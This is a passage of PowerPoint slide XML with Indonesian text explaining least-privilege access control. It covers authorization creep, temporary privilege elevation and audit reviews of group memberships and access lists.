              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sukses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implikasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akun yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melemahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infeksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembobolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus-menerus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perayapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merayap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>situasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>periode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disepakati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keanggotaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
